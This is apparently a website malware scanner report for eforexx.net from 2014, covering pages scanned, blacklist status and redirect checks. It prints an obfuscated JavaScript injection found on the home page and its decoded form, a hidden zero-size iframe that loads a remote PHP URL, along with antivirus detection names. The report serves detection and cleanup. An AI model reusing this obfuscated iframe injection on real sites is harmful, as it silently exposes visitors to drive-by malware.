New scan:

Malware Scanner report for eforexx.net

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://eforexx.net/
200 OK
Content-Length: 34416
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var JqtwWze3uMc = 'JqtwWze3uMc3cJqtwWze3uMc69JqtwWze3uMc66JqtwWze3uMc72JqtwWze3uMc61JqtwWze3uMc6dJqtwWze3uMc65JqtwWze3uMc20JqtwWze3uMc73JqtwWze3uMc72JqtwWze3uMc63JqtwWze3uMc3dJqtwWze3uMc22JqtwWze3uMc68JqtwWze3uMc74JqtwWze3uMc74JqtwWze3uMc70JqtwWze3uMc3aJqtwWze3uMc2fJqtwWze3uMc2fJqtwWze3uMc31JqtwWze3uMc37JqtwWze3uMc36JqtwWze3uMc2eJqtwWze3uMc33JqtwWze3uMc31JqtwWze3uMc2eJqtwWze3uMc37JqtwWze3uMc32JqtwWze3uMc2eJqtwWze3uMc39JqtwWze3uMc36JqtwWze3uMc2fJqtwWze3uMc6aJqtwWze3uMc64JqtwWze3uMc62JqtwWze3uMc2f
... 779 bytes are skipped ...
8JqtwWze3uMc74JqtwWze3uMc3dJqtwWze3uMc22JqtwWze3uMc30JqtwWze3uMc22JqtwWze3uMc20JqtwWze3uMc66JqtwWze3uMc72JqtwWze3uMc61JqtwWze3uMc6dJqtwWze3uMc65JqtwWze3uMc62JqtwWze3uMc6fJqtwWze3uMc72JqtwWze3uMc64JqtwWze3uMc65JqtwWze3uMc72JqtwWze3uMc3dJqtwWze3uMc22JqtwWze3uMc30JqtwWze3uMc22JqtwWze3uMc3eJqtwWze3uMc3cJqtwWze3uMc2fJqtwWze3uMc69JqtwWze3uMc66JqtwWze3uMc72JqtwWze3uMc61JqtwWze3uMc6dJqtwWze3uMc65JqtwWze3uMc3e'; lvqqDj2UIJT = JqtwWze3uMc.replace(/JqtwWze3uMc/g,'%');document.write(unescape(lvqqDj2UIJT));

Decoded script:


<iframe src="http://176.31.72.96/jdb/inf.php?id=47640a0be5937393c342fa34f09c6e21" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

nProtect
JS:Trojan.Iframer.A
Emsisoft
JS:Trojan.Iframer.A (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Kaspersky
HEUR:Trojan.Script.Iframer
MicroWorld-eScan
JS:Trojan.Iframer.A
McAfee
JS/Redirect-Jdb.a
F-Secure
JS:Trojan.Iframer.A
VIPRE
Heur.HTML.MalIFrame (v)
Norman
Iframe.TQ
GData
JS:Trojan.Iframer.A
BitDefender
JS:Trojan.Iframer.A

http://eforexx.net/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://eforexx.net/templates/eforexx02/script.js
200 OK
Content-Length: 10774
Content-Type: application/javascript
clean
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery-1.6.1.min.js
200 OK
Content-Length: 91342
Content-Type: application/javascript
clean
http://eforexx.net/modules/mod_PlimunNivoSlider/js/jquery.nivo.slider.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://eforexx.net/test404page.js
404 Not Found
Content-Length: 481
Content-Type: text/html
clean
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
500 Can't connect to cdn.widgetserver.com:80 (Bad hostname)
Content-Length: 172
Content-Type: text/plain
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eforexx.net

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:25:26 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 16:25:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a5703b588b242a389d4a6e74591d03ef=ggp4dvt2gkfv0bqrobmqu1hj76; path=/
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: eforexx.net
Referer: http://www.google.com/search?q=eforexx.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eforexx.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eforexx.net/

Result: eforexx.net is not infected or malware details are not published yet.